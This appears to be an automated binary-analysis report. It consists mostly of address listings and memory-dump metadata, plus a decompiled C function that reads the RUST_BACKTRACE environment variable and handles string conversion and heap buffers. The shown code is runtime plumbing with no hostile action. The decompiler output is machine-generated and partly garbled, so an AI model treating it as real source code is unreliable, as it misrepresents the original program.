                          0x0111770a
                          0x01117715
                          0x0111772b
                          0x0111773a
                          0x0111773d
                          0x01117744
                          0x0111774f
                          0x0111775a
                          0x01117762
                          0x0111776d
                          0x01117778
                          0x01117783
                          0x0111778e
                          0x011177a4
                          0x011177ab
                          0x011177b6
                          0x011177c1
                          0x011177cc
                          0x011177d7
                          0x011177e2
                          0x011177ed
                          0x01117800
                          0x01117801
                          0x01117808
                          0x01117813
                          0x01117827
                          0x0111782e
                          0x01117839
                          0x01117844
                          0x0111784f
                          0x0111785a
                          0x01117865
                          0x01117878
                          0x0111787f
                          0x0111788a
                          0x01117895
                          0x011178a0
                          0x011178ab
                          0x011178b6
                          0x011178c1
                          0x011178cc
                          0x011178d9
                          0x011178e4
                          0x011178f3
                          0x011178f6
                          0x01117900
                          0x01117901
                          0x01117907
                          0x0111790f
                          0x01117917
                          0x01117922
                          0x0111792d
                          0x01117938
                          0x01117943
                          0x0111794e
                          0x01117959
                          0x01117964
                          0x0111796f
                          0x01117984
                          0x0111798b
                          0x01117996
                          0x0111799e
                          0x011179a3
                          0x011179a8
                          0x011179b0
                          0x011179b8
                          0x011179c3
                          0x011179ce
                          0x011179d6
                          0x011179e1
                          0x011179e9
                          0x011179f1
                          0x011179f6
                          0x011179fe
                          0x01117a06
                          0x01117a0b
                          0x01117a13
                          0x01117a18
                          0x01117a20
                          0x01117a28
                          0x01117a2d
                          0x01117a35
                          0x01117a3d
                          0x01117a48
                          0x01117a53
                          0x01117a5e
                          0x01117a69
                          0x01117a74
                          0x01117a7c
                          0x01117a87
                          0x01117a8f
                          0x01117a97
                          0x01117a9f
                          0x01117aa7
                          0x01117aaf
                          0x01117aba
                          0x01117ac2
                          0x01117acd
                          0x01117ad8
                          0x01117ae3
                          0x01117af4
                          0x01117af5
                          0x01117afc
                          0x01117b07
                          0x01117b12
                          0x01117b1d
                          0x01117b28
                          0x01117b35
                          0x01117b49
                          0x01117b50
                          0x01117b58
                          0x01117b63
                          0x01117b70
                          0x01117b74
                          0x01117b7c
                          0x01117b84
                          0x01117b8f
                          0x01117b97
                          0x01117ba2
                          0x01117bad
                          0x01117bb8
                          0x01117bc3
                          0x01117bce
                          0x01117bd9
                          0x01117be4
                          0x01117bef
                          0x01117c02
                          0x01117c09
                          0x01117c14
                          0x01117c1f
                          0x01117c2a
                          0x01117c35
                          0x01117c40
                          0x01117c4b
                          0x01117c56
                          0x01117c61
                          0x01117c6c
                          0x01117c77
                          0x01117c82
                          0x01117c8a
                          0x01117c8f
                          0x01117c97
                          0x01117c9c
                          0x01117ca4
                          0x01117caf
                          0x01117cc2
                          0x01117cc9
                          0x01117cd4
                          0x01117cdf
                          0x01117cea
                          0x01117cf5
                          0x01117d00
                          0x01117d08
                          0x01117d13
                          0x01117d1e
                          0x01117d29
                          0x01117d34
                          0x01117d3f
                          0x01117d4a
                          0x01117d55
                          0x01117d60
                          0x01117d6b
                          0x01117d73
                          0x01117d7e
                          0x01117d89
                          0x01117d94
                          0x01117d9f
                          0x01117daa
                          0x01117db5
                          0x01117dbd
                          0x01117dc5
                          0x01117dca
                          0x01117dd2
                          0x01117dda
                          0x01117de5
                          0x01117df0
                          0x01117dfb
                          0x01117e06
                          0x01117e19
                          0x01117e20
                          0x01117e2b
                          0x01117e33
                          0x01117e43
                          0x01117e48
                          0x01117e4c
                          0x01117e54
                          0x01117e5c
                          0x01117e64
                          0x01117e6c
                          0x01117e74
                          0x01117e7c
                          0x01117e84
                          0x01117e8c
                          0x01117e94
                          0x01117e9c
                          0x01117ea4
                          0x01117eac
                          0x01117eb1
                          0x01117eb9
                          0x01117ec1
                          0x01117ec9
                          0x01117ece
                          0x01117ed3
                          0x01117edb
                          0x01117ee3
                          0x01117eee
                          0x01117ef6
                          0x01117f01
                          0x01117f0c
                          0x01117f14
                          0x01117f1c
                          0x01117f24
                          0x01117f2c
                          0x01117f34
                          0x01117f3f
                          0x01117f47
                          0x01117f52
                          0x01117f61
                          0x01117f62
                          0x01117f66
                          0x01117f6b
                          0x01117f73
                          0x01117f7b
                          0x01117f88
                          0x01117f8c
                          0x01117f91
                          0x01117f99
                          0x01117fa1
                          0x01117fac
                          0x01117fc2
                          0x01117fc9
                          0x01117fd4
                          0x01117fdf
                          0x01117fea
                          0x01117ff5
                          0x01118000
                          0x01118008
                          0x0111800d
                          0x01118012
                          0x01118017
                          0x0111801f
                          0x0111802d
                          0x01118031
                          0x01118035
                          0x0111803d
                          0x01118045
                          0x0111804d
                          0x0111805a
                          0x0111805e
                          0x01118066
                          0x01118071
                          0x0111807c
                          0x01118087
                          0x0111808c
                          0x01118094
                          0x01118099
                          0x011180a1
                          0x011180a9
                          0x011180b1
                          0x011180b9
                          0x011180b9
                          0x011180b9
                          0x011180be
                          0x011180be
                          0x011180be
                          0x011180c3
                          0x011180c8
                          0x011180c8
                          0x011180c8
                          0x011180c8
                          0x011180ca
                          0x00000000
                          0x00000000
                          0x011180d0
                          0x011182c7
                          0x011182e9
                          0x011182f5
                          0x011182f8
                          0x011182ff
                          0x01118304
                          0x00000000
                          0x011180d6
                          0x011180dc
                          0x0111829c
                          0x011182a3
                          0x011180b9
                          0x011180b9
                          0x011180b9
                          0x00000000
                          0x011180b9
                          0x011180e2
                          0x011180e4
                          0x0111826c
                          0x01118273
                          0x01118279
                          0x0111827b
                          0x011180b9
                          0x011180b9
                          0x011180b9
                          0x00000000
                          0x011180b9
                          0x011180ea
                          0x011180f0
                          0x0111825b
                          0x00000000
                          0x011180f6
                          0x011180fc
                          0x0111824d
                          0x01118254
                          0x011180b9
                          0x011180b9
                          0x011180b9
                          0x00000000
                          0x011180b9
                          0x01118102
                          0x01118108
                          0x01118155
                          0x0111815e
                          0x0111816c
                          0x01118173
                          0x01118175
                          0x01118178
                          0x011181c7
                          0x011181cc
                          0x011181cf
                          0x011181d3
                          0x01118208
                          0x011181d5
                          0x011181f9
                          0x011181fe
                          0x01118201
                          0x01118201
                          0x01118225
                          0x0111822a
                          0x0111822a
                          0x0111822d
                          0x0111822d
                          0x0111853c
                          0x0111853c
                          0x01118541
                          0x01118546
                          0x00000000
                          0x0111810a
                          0x0111810c
                          0x00000000
                          0x01118112
                          0x01118121
                          0x0111813e
                          0x01118143
                          0x0111814d
                          0x011180b9
                          0x011180b9
                          0x011180b9
                          0x011180be
                          0x011180be
                          0x011180c3
                          0x00000000
                          0x011180c3
                          0x011180b9
                          0x0111810c
                          0x01118108
                          0x011180fc
                          0x011180f0
                          0x011180e4
                          0x011180dc
                          0x0111835f
                          0x01118369
                          0x01118369
                          0x0111830c
                          0x0111830e
                          0x01118514
                          0x01118522
                          0x01118527
                          0x0111852a
                          0x0111852e
                          0x0111853a
                          0x00000000
                          0x01118530
                          0x01118530
                          0x00000000
                          0x01118530
                          0x01118314
                          0x01118314
                          0x0111831a
                          0x01118432
                          0x0111843e
                          0x0111844c
                          0x01118451
                          0x0111845f
                          0x011184a6
                          0x011184b4
                          0x011184d3
                          0x011184d8
                          0x011184f6
                          0x011184fb
                          0x00000000
                          0x01118320
                          0x01118320
                          0x01118326
                          0x01118391
                          0x0111839d
                          0x011183ab
                          0x011183b1
                          0x011183b4
                          0x01118407
                          0x01118414
                          0x01118422
                          0x01118425
                          0x0111842a
                          0x00000000
                          0x01118328
                          0x01118328
                          0x0111832a
                          0x01118380
                          0x01118387
                          0x011180b9
                          0x011180b9
                          0x011180b9
                          0x00000000
                          0x011180b9
                          0x0111832c
                          0x0111832c
                          0x01118332
                          0x00000000
                          0x01118338
                          0x01118355
                          0x0111835a
                          0x01118332
                          0x0111832a
                          0x01118326
                          0x0111831a
                          0x00000000
                          0x0111854b
                          0x0111854b
                          0x0111854b
                          0x00000000
                          0x01118557
                          0x011180be

                          Strings
                          Memory Dump Source
                          • Source File: 00000002.00000002.620644706.0000000001100000.00000040.00000010.sdmp, Offset: 01100000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: SP$*l$:K$KP$?$M$O#Q$Qx~$Zej$d$e/$f9($p<$x&$z2$|L$ K%$-V$6$L3$u$c
                          • API String ID: 0-4041043011
                          • Opcode ID: 725b493af553d4a4850222da80fc8680aabe3fb062347813f8953c01816dca8c
                          • Instruction ID: 8163a28757be4b63a6c97dde6d2c1434d8c9bd56447e865c3a8470f0ca2b114e
                          • Opcode Fuzzy Hash: 725b493af553d4a4850222da80fc8680aabe3fb062347813f8953c01816dca8c
                          • Instruction Fuzzy Hash: 2C82F17150D3818BD7B9CF64C48AB8BBBE2FBC4304F10891DE68A96264DBB18549CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6ECDD530, Relevance: 26.7, APIs: 14, Strings: 1, Instructions: 445memoryCOMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 81%
                          			E6ECDD530(signed int __ebx, long* __ecx, signed int __edi, long __esi, char _a8) {
				long _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				long _v40;
				void* _v44;
				void* _v48;
				long _v52;
				signed int _v56;
				void* _v60;
				signed int _v64;
				signed int _v68;
				void* _v72;
				long* _v76;
				signed int _v80;
				signed int _v1096;
				long _v1100;
				void* _v1104;
				void* __ebp;
				void* _t142;
				void* _t143;
				void* _t148;
				signed int _t149;
				intOrPtr _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t160;
				void** _t161;
				void* _t167;
				long _t171;
				signed int _t172;
				long _t173;
				void* _t179;
				void* _t181;
				long _t194;
				signed int _t195;
				signed char _t196;
				signed int _t199;
				signed int _t200;
				signed int _t211;
				signed int _t213;
				signed int _t214;
				void* _t218;
				intOrPtr _t220;
				signed int _t223;
				intOrPtr* _t224;
				intOrPtr _t226;
				signed int _t228;
				char* _t229;
				signed int _t230;
				signed int _t232;
				signed int _t238;
				signed int _t241;
				signed int _t242;
				WCHAR* _t247;
				long _t248;
				signed int _t249;
				signed int _t252;
				char* _t264;
				void* _t265;
				void* _t267;
				void* _t268;
				signed char* _t273;
				signed int _t274;
				void* _t280;
				intOrPtr _t281;

				_t262 = __esi;
				_t245 = __edi;
				_t192 = __ebx;
				_push(__ebx);
				_push(__edi);
				_push(__esi);
				_t281 = _t280 - 0x440;
				_v32 = _t281;
				_v20 = 0xffffffff;
				_v24 = E6ECE3B80;
				_v76 = __ecx;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				_t142 =  *0x6ed2adc8;
				if(_t142 != 0) {
					L3:
					_t143 = HeapAlloc(_t142, 0, 0xa);
					if(_t143 == 0) {
						goto L94;
					} else {
						_t264 = "UST_BACKTRACE";
						_t241 = 1;
						_t211 = 0;
						 *_t143 = 0x52;
						_v1104 = _t143;
						_v1100 = 5;
						_v1096 = 1;
						_v44 = 0;
						while(1) {
							_v36 = _t211;
							if(_t211 == 0) {
								goto L10;
							}
							_v44 = 0;
							_t211 = 0;
							if(_t241 != _v1100) {
								L6:
								_t245 = _v36;
								 *((short*)(_t143 + _t241 * 2)) = _v36;
								_t241 = _t241 + 1;
								_v1096 = _t241;
								continue;
							} else {
								L13:
								_v40 = _t264;
								_v20 = 0;
								_v48 = _t241;
								_t188 =  <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11;
								_t189 = ( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2;
								asm("sbb eax, 0x0");
								_t190 = (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2;
								E6ECF7370( &_v1104, _t241, (( <  ? 0xffffffff : "RUST_BACKTRACE" - _t264 + 0x11) >> 2) + 2);
								_t281 = _t281 + 4;
								_t143 = _v1104;
								_t241 = _v48;
								_t264 = _v40;
								_t211 = _v44;
								goto L6;
							}
							L10:
							__eflags = _t264 - 0x6ed1d2be;
							if(_t264 != 0x6ed1d2be) {
								_t196 =  *_t264 & 0x000000ff;
								_t229 =  &(_t264[1]);
								_t249 = _t196 & 0x000000ff;
								__eflags = _t196;
								if(_t196 < 0) {
									_v36 = _t249 & 0x0000001f;
									__eflags = _t229 - 0x6ed1d2be;
									if(_t229 == 0x6ed1d2be) {
										_t230 = 0;
										__eflags = _t196 - 0xdf;
										_t252 = 0;
										_v40 = 0x6ed1d2be;
										if(_t196 > 0xdf) {
											goto L25;
										} else {
											_v36 = _v36 << 6;
											_t264 = 0x6ed1d2be;
											_t211 = 0;
											__eflags = _t241 - _v1100;
											if(_t241 != _v1100) {
												goto L6;
											} else {
												goto L13;
											}
										}
									} else {
										_t238 = _t264[1] & 0x000000ff;
										_t264 =  &(_t264[2]);
										_t230 = _t238 & 0x0000003f;
										__eflags = _t196 - 0xdf;
										if(_t196 <= 0xdf) {
											_t199 = _v36 << 0x00000006 | _t230;
											__eflags = _t199 - 0xffff;
											if(_t199 > 0xffff) {
												goto L32;
											} else {
												goto L22;
											}
										} else {
											__eflags = _t264 - 0x6ed1d2be;
											if(_t264 == 0x6ed1d2be) {
												_t252 = 0;
												__eflags = 0;
												_v40 = 0x6ed1d2be;
											} else {
												_v40 =  &(_t264[1]);
												_t252 =  *_t264 & 0x3f;
											}
											L25:
											_t232 = _t230 << 0x00000006 | _t252;
											__eflags = _t196 - 0xf0;
											if(_t196 < 0xf0) {
												_t199 = _v36 << 0x0000000c | _t232;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 > 0xffff) {
													goto L32;
												} else {
													goto L22;
												}
											} else {
												_t273 = _v40;
												__eflags = _t273 - 0x6ed1d2be;
												if(_t273 == 0x6ed1d2be) {
													_t274 = 0;
													__eflags = 0;
													_v40 = 0x6ed1d2be;
												} else {
													_v40 =  &(_t273[1]);
													_t274 =  *_t273 & 0x3f;
												}
												_t199 = _t232 << 0x00000006 | (_v36 & 0x00000007) << 0x00000012 | _t274;
												_t264 = _v40;
												__eflags = _t199 - 0xffff;
												if(_t199 <= 0xffff) {
													L22:
													_v36 = _t199;
													_t211 = 0;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												} else {
													L32:
													_t200 = _t199 + 0xffff0000;
													_v40 = _t264;
													_v36 = _t200 >> 0x0000000a | 0x0000d800;
													_t264 = _v40;
													_t211 = _t200 & 0x000003ff | 0x0000dc00;
													_v44 = _t211;
													__eflags = _t241 - _v1100;
													if(_t241 != _v1100) {
														goto L6;
													} else {
														goto L13;
													}
												}
											}
										}
									}
								} else {
									_t264 = _t229;
									_v36 = _t249;
									_t211 = 0;
									__eflags = _t241 - _v1100;
									if(_t241 != _v1100) {
										goto L6;
									} else {
										goto L13;
									}
								}
								goto L96;
							}
							_t242 = _v1096;
							asm("movsd xmm0, [ebp-0x44c]");
							_v64 = _t242;
							asm("movsd [ebp-0x44], xmm0");
							__eflags = _t242 - 8;
							_t213 = _t242;
							_t148 = _v72;
							_t265 = _t148;
							if(_t242 < 8) {
								L45:
								_t214 = _t213 + _t213;
								asm("o16 nop [cs:eax+eax]");
								while(1) {
									__eflags = _t214;
									if(_t214 == 0) {
										break;
									}
									_t214 = _t214 + 0xfffffffe;
									__eflags =  *_t265;
									_t265 = _t265 + 2;
									if(__eflags != 0) {
										continue;
									} else {
										goto L48;
									}
									goto L96;
								}
								__eflags = _t242 - _v68;
								if(_t242 == _v68) {
									_v20 = 1;
									E6ECF7370( &_v72, _t242, 1);
									_t281 = _t281 + 4;
									_t148 = _v72;
									_t242 = _v64;
								}
								 *((short*)(_t148 + _t242 * 2)) = 0;
								asm("movsd xmm0, [ebp-0x44]");
								asm("movsd [ebp-0x38], xmm0");
								_t149 = _v60;
								__eflags = _t149;
								_v36 = _t149;
								if(_t149 == 0) {
									goto L75;
								} else {
									_v80 = _v56;
									E6ECEC310(_t245,  &_v1104, 0, 0x400);
									_t281 = _t281 + 0xc;
									_t155 =  *0x6ed1d0bc; // 0x2
									_t194 = 0x200;
									_t262 = 0;
									_v60 = _t155;
									_v56 = 0;
									_v48 = _t155;
									_v52 = 0;
									__eflags = 0x200 - 0x201;
									if(0x200 >= 0x201) {
										L65:
										_t157 = _t194 - _t262;
										__eflags = _v56 - _t262 - _t157;
										if(_v56 - _t262 < _t157) {
											_v44 = _t194;
											_v20 = 5;
											E6ECF7370( &_v60, _t262, _t157);
											_t281 = _t281 + 4;
											_t194 = _v44;
											_v48 = _v60;
										}
										_t247 = _v48;
										_t262 = _t194;
										_v52 = _t194;
										_v40 = _t194;
									} else {
										L68:
										_t247 =  &_v1104;
										_v40 = 0x200;
									}
									L69:
									_v44 = _t247;
									SetLastError(0);
									_t158 = GetEnvironmentVariableW(_v36, _t247, _t194);
									_t245 = _t158;
									__eflags = _t158;
									if(_t158 != 0) {
										L71:
										__eflags = _t245 - _t194;
										if(_t245 != _t194) {
											L63:
											__eflags = _t245 - _t194;
											_t192 = _t245;
											if(_t245 < _t194) {
												_t239 = _v40;
												_v20 = 5;
												__eflags = _t245 - _v40;
												if(__eflags > 0) {
													goto L95;
												} else {
													_push(_t245);
													E6ECE0EC0(_t192,  &_v72, _v44, _t245, _t262);
													_t281 = _t281 + 4;
													_t218 = _v72;
													_t248 = _v68;
													_t262 = _v64;
													_t195 = 0;
													_t160 = _v56;
													__eflags = _t160;
													if(_t160 != 0) {
														goto L81;
													} else {
													}
													goto L84;
												}
											} else {
												__eflags = _t192 - 0x201;
												if(_t192 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										} else {
											_t171 = GetLastError();
											__eflags = _t171 - 0x7a;
											if(_t171 != 0x7a) {
												goto L63;
											} else {
												_t194 = _t194 + _t194;
												__eflags = _t194 - 0x201;
												if(_t194 < 0x201) {
													goto L68;
												} else {
													goto L65;
												}
												goto L69;
											}
										}
									} else {
										_t172 = GetLastError();
										__eflags = _t172;
										if(_t172 != 0) {
											_t195 = 1;
											_t173 = GetLastError();
											_t218 = 0;
											_t248 = _t173;
											_t160 = _v56;
											__eflags = _t160;
											if(_t160 != 0) {
												L81:
												__eflags = _v48;
												if(_v48 != 0) {
													__eflags = _t160 & 0x7fffffff;
													if((_t160 & 0x7fffffff) != 0) {
														_v44 = _t218;
														HeapFree( *0x6ed2adc8, 0, _v48);
														_t218 = _v44;
													}
												}
											}
											L84:
											__eflags = _t195;
											if(_t195 == 0) {
												_t161 = _v76;
												 *_t161 = _t218;
												_t161[1] = _t248;
												_t161[2] = _t262;
											} else {
												__eflags = _t218 - 3;
												 *_v76 = 0;
												if(_t218 == 3) {
													_v20 = 4;
													_v44 = _t248;
													 *((intOrPtr*)( *((intOrPtr*)(_t248 + 4))))( *_t248);
													_t281 = _t281 + 4;
													_t267 = _v44;
													_t220 =  *((intOrPtr*)(_t267 + 4));
													__eflags =  *(_t220 + 4);
													if( *(_t220 + 4) != 0) {
														_t167 =  *_t267;
														__eflags =  *((intOrPtr*)(_t220 + 8)) - 9;
														if( *((intOrPtr*)(_t220 + 8)) >= 9) {
															_t167 =  *(_t167 - 4);
														}
														HeapFree( *0x6ed2adc8, 0, _t167);
													}
													HeapFree( *0x6ed2adc8, 0, _t267);
												}
											}
											__eflags = _v80 & 0x7fffffff;
											if((_v80 & 0x7fffffff) != 0) {
												HeapFree( *0x6ed2adc8, 0, _v36);
											}
											goto L76;
										} else {
											goto L71;
										}
									}
								}
							} else {
								_t228 = _t242;
								_t268 = _t148;
								while(1) {
									__eflags =  *_t268;
									if( *_t268 == 0) {
										break;
									}
									__eflags =  *((short*)(_t268 + 2));
									if( *((short*)(_t268 + 2)) == 0) {
										break;
									} else {
										__eflags =  *((short*)(_t268 + 4));
										if( *((short*)(_t268 + 4)) == 0) {
											break;
										} else {
											__eflags =  *((short*)(_t268 + 6));
											if( *((short*)(_t268 + 6)) == 0) {
												break;
											} else {
												__eflags =  *((short*)(_t268 + 8));
												if( *((short*)(_t268 + 8)) == 0) {
													break;
												} else {
													__eflags =  *((short*)(_t268 + 0xa));
													if( *((short*)(_t268 + 0xa)) == 0) {
														break;
													} else {
														__eflags =  *((short*)(_t268 + 0xc));
														if( *((short*)(_t268 + 0xc)) == 0) {
															break;
														} else {
															__eflags =  *((short*)(_t268 + 0xe));
															if( *((short*)(_t268 + 0xe)) == 0) {
																break;
															} else {
																_t228 = _t228 + 0xfffffff8;
																_t268 = _t268 + 0x10;
																__eflags = _t228 - 7;
																if(_t228 > 7) {
																	continue;
																} else {
																	goto L45;
																}
															}
														}
													}
												}
											}
										}
									}
									goto L96;
								}
								L48:
								_t223 = _v68;
								_v56 = 0x6ed1dec8;
								_v60 = 0x1402;
								__eflags = _t223;
								if(_t223 != 0) {
									__eflags = _t148;
									if(_t148 != 0) {
										__eflags = _t223 & 0x7fffffff;
										if((_t223 & 0x7fffffff) != 0) {
											HeapFree( *0x6ed2adc8, 0, _t148);
										}
									}
								}
								__eflags = _v60 - 3;
								if(_v60 == 3) {
									_t224 = _v56;
									_v36 = _t224;
									_t70 = _t224 + 4; // 0x2c
									_v20 = 2;
									 *((intOrPtr*)( *_t70))( *_t224);
									_t281 = _t281 + 4;
									_t179 = _v36;
									_t226 =  *((intOrPtr*)(_t179 + 4));
									__eflags =  *(_t226 + 4);
									if( *(_t226 + 4) != 0) {
										_t181 =  *_t179;
										__eflags =  *((intOrPtr*)(_t226 + 8)) - 9;
										if( *((intOrPtr*)(_t226 + 8)) >= 9) {
											_t181 =  *(_t181 - 4);
										}
										HeapFree( *0x6ed2adc8, 0, _t181);
										_t179 = _v56;
									}
									HeapFree( *0x6ed2adc8, 0, _t179);
								}
								L75:
								 *_v76 = 0;
								L76:
								_t151 = _v28;
								 *[fs:0x0] = _t151;
								return _t151;
							}
							goto L96;
						}
					}
				} else {
					_t142 = GetProcessHeap();
					if(_t142 == 0) {
						L94:
						_t239 = 2;
						E6ECF6C30(_t192, 0xa, 2, _t245, _t262, __eflags);
						asm("ud2");
						L95:
						E6ECF6DB0(_t192, _t245, _t239, _t245, _t262, __eflags, 0x6ed1ded0);
						asm("ud2");
						__eflags =  &_a8;
						E6ECD4AA0( *_v44,  *((intOrPtr*)(_v44 + 4)));
						return E6ECDD420(_t263);
					} else {
						 *0x6ed2adc8 = _t142;
						goto L3;
					}
				}
				L96:
			}







































































                          0x6ecdd530
                          0x6ecdd530
                          0x6ecdd530
                          0x6ecdd533
                          0x6ecdd534
                          0x6ecdd535
                          0x6ecdd536
                          0x6ecdd53c
                          0x6ecdd53f
                          0x6ecdd546
                          0x6ecdd54d
                          0x6ecdd55a
                          0x6ecdd55d
                          0x6ecdd563
                          0x6ecdd56a
                          0x6ecdd57e
                          0x6ecdd583
                          0x6ecdd58a
                          0x00000000
                          0x6ecdd590
                          0x6ecdd590
                          0x6ecdd596
                          0x6ecdd59b
                          0x6ecdd59d
                          0x6ecdd5a2
                          0x6ecdd5a8
                          0x6ecdd5b2
                          0x6ecdd5bc
                          0x6ecdd5ed
                          0x6ecdd5f0
                          0x6ecdd5f3
                          0x00000000
                          0x00000000
                          0x6ecdd5f5
                          0x6ecdd5fc
                          0x6ecdd604
                          0x6ecdd5df
                          0x6ecdd5df
                          0x6ecdd5e2
                          0x6ecdd5e6
                          0x6ecdd5e7
                          0x00000000
                          0x6ecdd606
                          0x6ecdd63a
                          0x6ecdd644
                          0x6ecdd647
                          0x6ecdd64e
                          0x6ecdd659
                          0x6ecdd662
                          0x6ecdd66a
                          0x6ecdd66d
                          0x6ecdd671
                          0x6ecdd676
                          0x6ecdd5d0
                          0x6ecdd5d6
                          0x6ecdd5d9
                          0x6ecdd5dc
                          0x00000000
                          0x6ecdd5dc
                          0x6ecdd610
                          0x6ecdd616
                          0x6ecdd618
                          0x6ecdd61e
                          0x6ecdd621
                          0x6ecdd624
                          0x6ecdd627
                          0x6ecdd629
                          0x6ecdd681
                          0x6ecdd68a
                          0x6ecdd68c
                          0x6ecdd6b3
                          0x6ecdd6bb
                          0x6ecdd6be
                          0x6ecdd6c3
                          0x6ecdd6c6
                          0x00000000
                          0x6ecdd6c8
                          0x6ecdd6c8
                          0x6ecdd6cc
                          0x6ecdd6d2
                          0x6ecdd6d4
                          0x6ecdd6da
                          0x00000000
                          0x6ecdd6e0
                          0x00000000
                          0x6ecdd6e0
                          0x6ecdd6da
                          0x6ecdd68e
                          0x6ecdd68e
                          0x6ecdd692
                          0x6ecdd695
                          0x6ecdd698
                          0x6ecdd69b
                          0x6ecdd6eb
                          0x6ecdd6ed
                          0x6ecdd6f3
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecdd69d
                          0x6ecdd6a3
                          0x6ecdd6a5
                          0x6ecdd715
                          0x6ecdd715
                          0x6ecdd717
                          0x6ecdd6a7
                          0x6ecdd6ab
                          0x6ecdd6ae
                          0x6ecdd6ae
                          0x6ecdd71a
                          0x6ecdd71d
                          0x6ecdd71f
                          0x6ecdd722
                          0x6ecdd745
                          0x6ecdd747
                          0x6ecdd74a
                          0x6ecdd750
                          0x00000000
                          0x6ecdd752
                          0x00000000
                          0x6ecdd752
                          0x6ecdd724
                          0x6ecdd724
                          0x6ecdd72d
                          0x6ecdd72f
                          0x6ecdd75a
                          0x6ecdd75a
                          0x6ecdd75c
                          0x6ecdd731
                          0x6ecdd737
                          0x6ecdd73a
                          0x6ecdd73a
                          0x6ecdd76f
                          0x6ecdd771
                          0x6ecdd774
                          0x6ecdd77a
                          0x6ecdd6f9
                          0x6ecdd6f9
                          0x6ecdd6fc
                          0x6ecdd6fe
                          0x6ecdd704
                          0x00000000
                          0x6ecdd70a
                          0x00000000
                          0x6ecdd70a
                          0x6ecdd780
                          0x6ecdd780
                          0x6ecdd780
                          0x6ecdd786
                          0x6ecdd7a0
                          0x6ecdd7a3
                          0x6ecdd7a6
                          0x6ecdd7a8
                          0x6ecdd7ab
                          0x6ecdd7b1
                          0x00000000
                          0x6ecdd7b7
                          0x00000000
                          0x6ecdd7b7
                          0x6ecdd7b1
                          0x6ecdd77a
                          0x6ecdd722
                          0x6ecdd69b
                          0x6ecdd62b
                          0x6ecdd62b
                          0x6ecdd62d
                          0x6ecdd630
                          0x6ecdd632
                          0x6ecdd638
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecdd638
                          0x00000000
                          0x6ecdd629
                          0x6ecdd7bc
                          0x6ecdd7c2
                          0x6ecdd7ca
                          0x6ecdd7cd
                          0x6ecdd7d2
                          0x6ecdd7d5
                          0x6ecdd7d7
                          0x6ecdd7da
                          0x6ecdd7dc
                          0x6ecdd824
                          0x6ecdd824
                          0x6ecdd826
                          0x6ecdd830
                          0x6ecdd830
                          0x6ecdd832
                          0x00000000
                          0x00000000
                          0x6ecdd838
                          0x6ecdd83b
                          0x6ecdd83f
                          0x6ecdd842
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecdd842
                          0x6ecdd8d0
                          0x6ecdd8d3
                          0x6ecdd8d5
                          0x6ecdd8e1
                          0x6ecdd8e6
                          0x6ecdd8e9
                          0x6ecdd8ec
                          0x6ecdd8ec
                          0x6ecdd8ef
                          0x6ecdd8f5
                          0x6ecdd8fa
                          0x6ecdd8ff
                          0x6ecdd902
                          0x6ecdd904
                          0x6ecdd907
                          0x00000000
                          0x6ecdd90d
                          0x6ecdd910
                          0x6ecdd921
                          0x6ecdd926
                          0x6ecdd929
                          0x6ecdd92e
                          0x6ecdd933
                          0x6ecdd935
                          0x6ecdd938
                          0x6ecdd93f
                          0x6ecdd942
                          0x6ecdd949
                          0x6ecdd94f
                          0x6ecdd972
                          0x6ecdd977
                          0x6ecdd97b
                          0x6ecdd97d
                          0x6ecdd97f
                          0x6ecdd982
                          0x6ecdd98f
                          0x6ecdd994
                          0x6ecdd99a
                          0x6ecdd99d
                          0x6ecdd99d
                          0x6ecdd9a0
                          0x6ecdd9a3
                          0x6ecdd9a5
                          0x6ecdd9a8
                          0x6ecdd951
                          0x6ecdd9b0
                          0x6ecdd9b0
                          0x6ecdd9b6
                          0x6ecdd9b6
                          0x6ecdd9bd
                          0x6ecdd9bd
                          0x6ecdd9c2
                          0x6ecdd9cd
                          0x6ecdd9d3
                          0x6ecdd9d5
                          0x6ecdd9d7
                          0x6ecdd9e3
                          0x6ecdd9e3
                          0x6ecdd9e5
                          0x6ecdd960
                          0x6ecdd960
                          0x6ecdd962
                          0x6ecdd964
                          0x6ecdda26
                          0x6ecdda29
                          0x6ecdda30
                          0x6ecdda32
                          0x00000000
                          0x6ecdda38
                          0x6ecdda3e
                          0x6ecdda3f
                          0x6ecdda44
                          0x6ecdda47
                          0x6ecdda4a
                          0x6ecdda4d
                          0x6ecdda50
                          0x6ecdda52
                          0x6ecdda55
                          0x6ecdda57
                          0x00000000
                          0x00000000
                          0x6ecdda59
                          0x00000000
                          0x6ecdda57
                          0x6ecdd96a
                          0x6ecdd96a
                          0x6ecdd970
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6ecdd970
                          0x6ecdd9eb
                          0x6ecdd9eb
                          0x6ecdd9f1
                          0x6ecdd9f4
                          0x00000000
                          0x6ecdd9fa
                          0x6ecdd9fa
                          0x6ecdd9fc
                          0x6ecdda02
                          0x00000000
                          0x6ecdda04
                          0x00000000
                          0x6ecdda04
                          0x00000000
                          0x6ecdda02
                          0x6ecdd9f4
                          0x6ecdd9d9
                          0x6ecdd9d9
                          0x6ecdd9df
                          0x6ecdd9e1
                          0x6ecdda5b
                          0x6ecdda5d
                          0x6ecdda63
                          0x6ecdda65
                          0x6ecdda67
                          0x6ecdda6a
                          0x6ecdda6c
                          0x6ecdda6e
                          0x6ecdda6e
                          0x6ecdda72
                          0x6ecdda74
                          0x6ecdda79
                          0x6ecdda86
                          0x6ecdda89
                          0x6ecdda8e
                          0x6ecdda8e
                          0x6ecdda79
                          0x6ecdda72
